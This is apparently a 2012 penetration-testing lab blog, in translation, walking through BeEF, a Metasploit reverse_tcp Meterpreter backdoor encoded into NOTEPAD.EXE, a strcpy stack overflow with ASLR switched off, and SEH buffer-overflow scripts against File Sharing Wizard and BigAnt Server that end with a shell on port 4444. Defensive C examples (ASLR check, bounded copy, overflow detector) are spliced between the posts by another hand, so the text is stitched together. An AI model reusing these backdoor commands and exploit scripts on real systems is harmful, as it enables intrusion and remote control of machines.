Monday, 27 February 2012

Browser exploit attack vector with BeEF and Metasploit

First, go into the BeEF source directory and start BeEF.





USER/PASSWORD: beef/beef


[ 2:04:00][*] Version: 0.4.2.8-alpha - Run 'svn update' to update to the latest version.
[ 2:04:01][*] Resetting the database for BeEF.
[ 2:04:04][*] BeEF is loading. Wait a few seconds...
[ 2:04:07][*] 6 extensions loaded:
[ 2:04:07]    |   demonstrations
[ 2:04:07]    |   initialization
[ 2:04:07]    |   events logger
[ 2:04:07]    |   console
[ 2:04:07]    |   proxy
[ 2:04:07]    |_  administration web UI
[ 2:04:07][*] 32 modules loaded.
[ 2:04:07][*] 2 network interfaces were detected.
[ 2:04:07][+] running on network interface: 127.0.1.1
[ 2:04:07]    |   Hook URL: http://127.0.1.1:3000/hook.js
[ 2:04:07]    |_  UI URL:   http://127.0.1.1:3000/ui/panel
[ 2:04:07][+] running on network interface: 127.0.0.1
[ 2:04:07]    |   Hook URL: http://127.0.0.1:3000/hook.js
[ 2:04:07]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[ 2:04:07][+] HTTP Proxy: http://127.0.0.1:6789

Then log in to the BeEF web UI.

Then enter the user name and password.

msfpayload and msfencode are also used, as in the examples.

To plant a backdoor on the target machine on the network, we first have to prepare this type of attack.


After scanning the open ports with nmap:




The above shows how the target appears.




Here we have already got in and are in Meterpreter; wrftp is used to make the backdoor.



root@bt:~# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.1 R |msfencode -t exe -e x86/shikata_ga_nai -x /root/NOTEPAD.EXE -k -o hancur.exe -c 3

Then look at the backdoor that has been made.



Example of using a Metasploit auxiliary module

Here I try to plant a backdoor on the USB battery charger using a Metasploit auxiliary module.


I started by trying the syntax of the attack.





       ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`




       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
       =[ svn r14551 updated 44 days ago (2012.01.14)


Warning: This copy of the Metasploit Framework was last updated 44 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306


msf > use auxiliary/scanner/backdoor/energizer_duo_detect 
msf  auxiliary(energizer_duo_detect) > set R
set RHOSTS  set RPORT   
msf  auxiliary(energizer_duo_detect) > set RHOSTS 192.168.56.1
RHOSTS => 192.168.56.1

Above, the victim to be attacked is specified.


Then try that address, to get in through it.



msf  auxiliary(energizer_duo_detect) > set THREADS 256
THREADS => 256
msf  auxiliary(energizer_duo_detect) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(energizer_duo_detect) > set THREADS 21
THREADS => 21
msf  auxiliary(energizer_duo_detect) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(energizer_duo_detect) > set THREADS 256
THREADS => 256
msf  auxiliary(energizer_duo_detect) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Then I tried setting THREADS to 21, then set THREADS back to 256, but that did not work.

Next, try to get Meterpreter.



    (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
       =[ svn r14551 updated 44 days ago (2012.01.14)

Warning: This copy of the Metasploit Framework was last updated 44 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf > use exploit/windows/backdoor/energizer_duo_payload 
msf  exploit(energizer_duo_payload) > set RHOST 192.168.56.24
RHOST => 192.168.56.24

Understanding Social Engineering and SET (Social Engineering Toolkit)

What is social engineering?


In the world of network security there is a principle that says "the strength of a chain lies in its weakest link" (in English: "the strength of a chain depends on the weakest link"). It means that however good the links of a chain are, if one link is weak, that link limits the chain's strength. In network security the weakest component is the human. Even if a system is protected by sophisticated hardware and software against attacks, such as firewalls, anti-virus, IDS/IPS and so on, if the people who operate it fail, all that equipment means nothing. Cyber criminals know this, so they use a particular technique called "social engineering" to obtain the important and confidential information that a system keeps secret, by going through a human.

Security depends on trust: trust in terms of authentication and protection. It is generally agreed that, as the weakest link in the security chain, the natural human tendency to believe what other people say easily creates a gap in security. Do not rely on the system's security alone; it all depends on the people who keep a company or its information safe.

Target

The main purpose of social engineering with the aim of hacking is, in outline, the same: to gain access to a system or information that should not be allowed, in order to commit fraud, infiltration, surveillance or identity theft, or to destroy a system or network. The usual targets of social engineering are telephone network providers, answering machines, large corporations, financial institutions, government companies and hospitals.

Concrete examples of social engineering are quite hard to find. The target company will not admit it because it will be a thing to do

Friday, 24 February 2012

EXPLOITS ON BACKTRACK 5 R1 AS ROOT

Before attacking Linux we should turn off Linux ASLR, as follows.


First check the current setting with the command:



root@bt:~# cat /proc/sys/kernel/random
random/             randomize_va_space  
root@bt:~# cat /proc/sys/kernel/randomize_va_space 
2




Then type the command:
root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space 
root@bt:~# cat /proc/sys/kernel/randomize_va_space 
0
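The post turns ASLR off by writing 0 to randomize_va_space. For the reverse check, verifying that a host still has it on and seeing what the setting does, here is a small C program added as an example; it is not from the post. It parses the sysctl text (the parser is the testable part), prints a verdict, and prints a stack, heap, libc and binary address so that two consecutive runs show whether those addresses move. The mode descriptions follow the kernel's documented meanings; the non-zero exit status on anything other than 2 and the function names are my choice so the check can be scripted.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parse the text of /proc/sys/kernel/randomize_va_space.
 * Returns 0, 1 or 2 (the only values the kernel accepts) or -1 if the text
 * is empty, non-numeric or out of range. Surrounding whitespace is ignored. */
int parse_randomize_va_space(const char *text)
{
    if (text == NULL)
        return -1;
    while (*text == ' ' || *text == '\t')
        text++;
    if (!isdigit((unsigned char)*text))
        return -1;
    char *end;
    long v = strtol(text, &end, 10);
    while (*end != '\0') {              /* only whitespace may follow the number */
        if (!isspace((unsigned char)*end))
            return -1;
        end++;
    }
    return (v >= 0 && v <= 2) ? (int)v : -1;
}

/* Human-readable meaning of each mode, for reports. */
const char *aslr_verdict(int mode)
{
    switch (mode) {
    case 0:  return "DISABLED: stack, heap, mmap and shared libraries load at fixed addresses";
    case 1:  return "PARTIAL: stack, mmap and libraries randomized, brk heap is not";
    case 2:  return "FULL: stack, mmap, libraries and brk heap randomized (expected default)";
    default: return "UNKNOWN: could not read or parse randomize_va_space";
    }
}

/* Read the live setting; -1 if the file cannot be opened (non-Linux, no /proc). */
int read_randomize_va_space(void)
{
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    if (f == NULL)
        return -1;
    char line[32] = "";
    if (fgets(line, sizeof line, f) == NULL)
        line[0] = '\0';
    fclose(f);
    return parse_randomize_va_space(line);
}

int main(void)
{
    int local_marker = 0;               /* a stack address */
    void *heap = malloc(16);            /* a heap address */
    int mode = read_randomize_va_space();
    printf("randomize_va_space = %d -> %s\n", mode, aslr_verdict(mode));
    /* Run the program twice: with the post's "echo 0" these four addresses repeat,
     * with mode 2 they change between runs. */
    printf("stack  %p\nheap   %p\nlibc   %p (printf)\nbinary %p (main)\n",
           (void *)&local_marker, heap,
           (void *)(uintptr_t)printf, (void *)(uintptr_t)main);
    free(heap);
    return mode == 2 ? 0 : 1;           /* non-zero exit flags a weakened host */
}
```

Compile with gcc -o aslr_check aslr_check.c and run it twice. After the post's echo 0 the addresses repeat; sysctl -w kernel.randomize_va_space=2 restores full randomization, which is the default on current distributions (the setting is not persistent unless also written to sysctl.conf).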


Then write the C source to attack:

// I am a vulnerable thing.
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
        char buffer[500];
        if (argc < 2)            // need one argument to copy
                return 1;
        strcpy(buffer, argv[1]); //vulnerable function! no length check before the copy

        return 0;
}
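The comment in the program marks strcpy() as the vulnerable function: it copies argv[1] into the 500-byte buffer with no length check, which is why the post can feed it 600 and then 508 bytes and go looking at EIP (the build also passes -fno-stack-protector and ASLR is off, so nothing in the toolchain or kernel gets in the way). As an added example, not the post's code, here is the same program with the copy bounded: bounded_copy() refuses any input that does not fit together with its terminator, handle_input() keeps the original 500-byte frame, and copy_result_for_len() constructs an input of a given length so the exact boundary can be checked. The function names are mine.

```c
#include <stdio.h>
#include <string.h>

/* Length of s, but never scanning more than max bytes (like strnlen). */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Hardened counterpart of strcpy(buffer, argv[1]).
 * Returns 0 and fills dst on success, -1 if src does not fit in dstsz
 * including the terminating NUL. Never reads past dstsz bytes of src. */
int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    if (dst == NULL || src == NULL || dstsz == 0)
        return -1;
    size_t n = bounded_len(src, dstsz);
    if (n == dstsz)                  /* src is dstsz bytes or longer: no room for NUL */
        return -1;
    memcpy(dst, src, n + 1);         /* n + 1 <= dstsz, terminator included */
    return 0;
}

/* Same 500-byte stack frame as the original program; only the check differs.
 * Returns 0 when the input was accepted, 1 when it was rejected. */
int handle_input(const char *arg)
{
    char buffer[500];
    if (bounded_copy(buffer, sizeof buffer, arg) != 0) {
        fprintf(stderr, "input rejected: longer than %zu bytes\n", sizeof buffer - 1);
        return 1;
    }
    printf("accepted %zu bytes\n", strlen(buffer));
    return 0;
}

/* Constructed input of srclen 'A' bytes (up to 1023), pushed through handle_input()
 * so the boundary of the 500-byte buffer can be exercised without a shell. */
int copy_result_for_len(size_t srclen)
{
    static char src[1024];
    if (srclen >= sizeof src)
        return -1;
    memset(src, 'A', srclen);
    src[srclen] = '\0';
    return handle_input(src);
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    return handle_input(argv[1]);
}
```

The same 508-byte run from the post is rejected before anything is written past the buffer: 499 bytes is the longest input that fits, 500 already fails because the terminator would not. Building it without -fno-stack-protector adds the canary as a second line of defence, but the length check is what removes the bug.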


Then we try sending a normal buffer:

root@bt:~# gdb vulnerable_1 
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /root/vulnerable_1...done.

Then try to run it:


(gdb) run $(python -c 'print "\x41" * 600')


Then I tried to compile it, but there was an error because of a typo in the command:


root@bt:~# gcc -ggdb -0 vulnerable_1 -fno-stack-protector -mpreferred-stack-boundary=2 linux.c
gcc: unrecognized option '-0'

The correct command is:


root@bt:~# gcc -ggdb -o vulnerable_1 -fno-stack-protector -mpreferred-stack-boundary=2 linux.c
root@bt:~# gdb vulnerable_1 

Then I tried to run it:


(gdb) run $(python -c 'print "\x41" * 508')
Starting program: /root/vulnerable_1 $(python -c 'print "\x41" * 508')

Then I looked at EIP with the command:


(gdb) info register eip

Then I looked at all the registers:

(gdb) info register

Wednesday, 22 February 2012

SEH FILE SHARING WIZARD

The initial stage is to prepare the file sharing application,
and then prepare a fuzzer:




#!/usr/bin/python
import socket
target_address="192.168.56.24"
target_port=80  
#buffer = "USV "
#buffer+="\x90" * 962
buffer="http://"
buffer+="\x41" * 121000 + "\r\n\r\n"
#
buffer+="\x90" * 120025
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x41\x41\x41\x41"
buffer+="\x90" * (121004-len(buffer)) 
#buffer+="\r\n
#buffer+="\xcc\xcc\xcc\xcc"
#uffer+="\x41\x41\x41\x41"
#buffer+="\x90" * (150000 - len(buffer))
#buffer+="\x6A\x19\x9A\x0F" # al
#buffer+="\x90" * (3000 - len(buffer))
buffer+="\r\n\r\n"  
sock=socket.socket (socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()  




Then look at the crash that occurs in the application, viewed in OllyDbg.




Then look at the result via View -> SEH chain and press Shift+F9.




The above shows that the value of EIP is 41414141.


Then follow in dump
by right-clicking on the line in the stack.





The result of the follow in dump.






Then pattern_create is used, followed by pattern_offset:





root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 30785839 121000
18629
38909
59189
79469
99749
120029
root@bt:/pentest/exploits/framework/tools#


Then look at the results.








From here I started having problems: among others, 41414141 did not appear; what appeared instead was 90909090.

Friday, 17 February 2012

Exploiting BigAnt Server using SEH

Before starting, the first step is to prepare the fuzzer script:



#!/usr/bin/python
import socket
target_address="192.168.56.24"
target_port=6660
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket (socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()


The script above is used to crash the server.
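The fuzzer sends "USV " followed by 2500 bytes of 0x41, and the file sharing post above sends 121000 bytes of 0x41 plus a 0x90 sled the same way. From the server's side both look alike: one command line far longer than any real command, made of a single repeated byte. As an added example, not the post's code, here is a C check that a line-based service (or a sensor in front of it) could apply before a command is copied anywhere; the limits, the struct and function names, and the sample commands are constructed for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Limits a line-based command parser would enforce; constructed values. */
#define MAX_LINE_LEN   256   /* longest legitimate "USV ..." command line */
#define MAX_RUN_LEN     64   /* longest run of one byte seen in legitimate traffic */

typedef struct {
    size_t line_len;          /* bytes before the first '\n' (or whole buffer) */
    size_t longest_run;       /* longest run of a single repeated byte in that line */
    unsigned char run_byte;   /* the byte that formed that run */
} cmd_stats;

/* Measure the first line of a received command buffer. */
cmd_stats measure_command(const unsigned char *buf, size_t len)
{
    cmd_stats s = {0, 0, 0};
    size_t run = 0;
    for (size_t i = 0; i < len && buf[i] != '\n'; i++) {
        s.line_len++;
        run = (i > 0 && buf[i] == buf[i - 1]) ? run + 1 : 1;
        if (run > s.longest_run) {
            s.longest_run = run;
            s.run_byte = buf[i];
        }
    }
    return s;
}

/* 1 if the line is overlong or dominated by one repeated byte (filler such as
 * 0x41 'A', 0x90 NOP sleds, 0xCC int3), else 0. Either condition alone is enough:
 * a correct parser rejects the line before any fixed-size copy happens. */
int is_overflow_probe(const unsigned char *buf, size_t len)
{
    cmd_stats s = measure_command(buf, len);
    return (s.line_len > MAX_LINE_LEN || s.longest_run > MAX_RUN_LEN) ? 1 : 0;
}

/* Build "USV " + fill_len copies of `fill` + "\r\n\r\n" (constructed input shaped
 * like the fuzzer on this page) and classify it. Returns -1 on allocation failure. */
int classify_synthetic(size_t fill_len, unsigned char fill)
{
    size_t len = 4 + fill_len + 4;
    unsigned char *buf = malloc(len);
    if (buf == NULL)
        return -1;
    memcpy(buf, "USV ", 4);
    memset(buf + 4, fill, fill_len);
    memcpy(buf + 4 + fill_len, "\r\n\r\n", 4);
    int verdict = is_overflow_probe(buf, len);
    free(buf);
    return verdict;
}

int main(void)
{
    const unsigned char normal[] = "USV alice\r\n\r\n";   /* constructed sample */
    printf("normal command   -> %d\n", is_overflow_probe(normal, sizeof normal - 1));
    printf("USV + 2500 x 'A' -> %d\n", classify_synthetic(2500, 'A'));
    printf("USV + 962 x 0x90 -> %d\n", classify_synthetic(962, 0x90));
    return 0;
}
```

The length cap is the real fix (it is the check the vulnerable handler lacks); the repeated-byte heuristic is only useful for logging and alerting, since a well-formed oversized command would still be rejected by the cap and a short one with a run of 70 dots is a false positive worth tuning for.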


- Then run BigAnt Server under OllyDbg, then run the fuzzer; the crash will be seen.





The server is seen to have crashed with an error.


Then look at the SEH via the View -> SEH chain menu.





The crash is seen in the SEH chain.


Next, view the buffer that was sent in the SEH chain.




EIP is seen to have changed to 41414141; the crash is as expected.


Next, follow in dump; it will show the buffer in memory.








Above is the result of the stack and the dump.


Next is how to find the stepping stone.




This is used to view the running modules and take an instruction sequence from them, namely POP POP RETN.

The next step is to find the location of the POP POP instructions.


And this is the result of the stepping stone;
to make the POP, look at the steps below.



Next, OllyDbg will find the address in memory.

Then find the offset that overwrites SEH; it is searched for using the fuzzer script below:


#!/usr/bin/python
import socket
target_address="192.168.56.24"
target_port=6660
buffer = "USV "
buffer+=("a0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3"
         "Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db")
buffer+="\r\n\n"
sock=socket.socket (socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()




That is the result of the fuzzer script that was made.

Then try pattern_offset.
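In the file sharing post above, pattern_offset.rb 30785839 121000 returned six offsets (18629, 38909, 59189, ...). The reason is that the pattern pattern_create.rb produces is built from 26 * 26 * 10 upper/lower/digit triplets, so it is only 20280 bytes long and then repeats; any four-byte value found in a 121000-byte buffer therefore matches six times, 20280 bytes apart, and the tool cannot tell which copy landed in the register. As an added example, not code from the post or from Metasploit, here is the generator and the search in C, with the register value interpreted in little-endian byte order as the tool does; the function names are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Alphabet of the classic cyclic pattern: one upper, one lower, one digit per triplet. */
static const char UPPER[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
static const char LOWER[] = "abcdefghijklmnopqrstuvwxyz";
static const char DIGIT[] = "0123456789";

/* Bytes before the triplet sequence wraps around: 26*26*10 triplets of 3 bytes. */
size_t pattern_period(void)
{
    return 26u * 26u * 10u * 3u;   /* 20280 */
}

/* Fill `out` with `len` bytes of the pattern "Aa0Aa1Aa2...". Returns len. */
size_t cyclic_pattern(char *out, size_t len)
{
    size_t pos = 0;
    for (size_t t = 0; pos < len; t++) {
        const char trip[3] = { UPPER[(t / 260) % 26], LOWER[(t / 10) % 26], DIGIT[t % 10] };
        for (int i = 0; i < 3 && pos < len; i++)
            out[pos++] = trip[i];
    }
    return pos;
}

/* Find every offset in a `len`-byte pattern where the four bytes equal `reg_value`
 * as it sits in memory on x86 (little-endian: 0x30785839 is the text "9Xx0").
 * Writes up to max_out offsets into `out` and returns how many were found;
 * more than one hit means the buffer was longer than pattern_period(). */
size_t pattern_offsets(size_t len, uint32_t reg_value, size_t *out, size_t max_out)
{
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)((reg_value >> (8 * i)) & 0xffu);

    char *pat = malloc(len);
    if (pat == NULL)
        return 0;
    cyclic_pattern(pat, len);

    size_t count = 0;
    for (size_t i = 0; i + 4 <= len && count < max_out; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            out[count++] = i;
    free(pat);
    return count;
}

int main(void)
{
    size_t offs[16];
    size_t n = pattern_offsets(121000, 0x30785839u, offs, 16);   /* the post's query */
    printf("pattern period: %zu bytes\n", pattern_period());
    printf("%zu match(es) for 0x30785839 in 121000 bytes:", n);
    for (size_t i = 0; i < n; i++)
        printf(" %zu", offs[i]);
    printf("\n");
    return 0;
}
```

Because each copy of the pattern is identical, the only way to resolve which of the six offsets is the real one is a second test with a buffer that does not repeat (shorter than 20280 bytes, or built from a larger alphabet), which is also why the 2500-byte pattern in the BigAnt post gives a single unambiguous answer.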



Now enter the vbajet32.dll address at the offset:

#!/usr/bin/python
import socket
target_address="192.168.56.24"
target_port=6660
buffer = "USV "
buffer+="\x90" * 962
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x6A\x19\x9A\x0F" # al
buffer+="\x90" * (2504 - len(buffer))
buffer+="\r\n\n"
sock=socket.socket (socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()

Above is the result of the fuzzer with vbajet32.dll.


Then I go straight to Metasploit, with the command:

root@bt:~# cd /pentest/exploits/framework2/
root@bt:/pentest/exploits/framework2# ls
data  encoders  extras  msfcli      msfdldebug  msfencode   msfpayload  msfupdate  nops      sdk  t
docs  exploits  lib     msfconsole  msfelfscan  msflogdump  msfpescan   msfweb     payloads  src  tools
root@bt:/pentest/exploits/framework2# ./msfweb 
+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

Then go to the browser and enter the Metasploit web interface address.


Above is the assembler code and the port; look at the code.

Then copy the generated payload into the fuzzer.





The Python script is ready to run.


Then run the fuzzer command correctly, open BigAnt Server, and run telnet 192.168.56.24 4444.


The result above: we have got into the Windows system.
                        " good luck "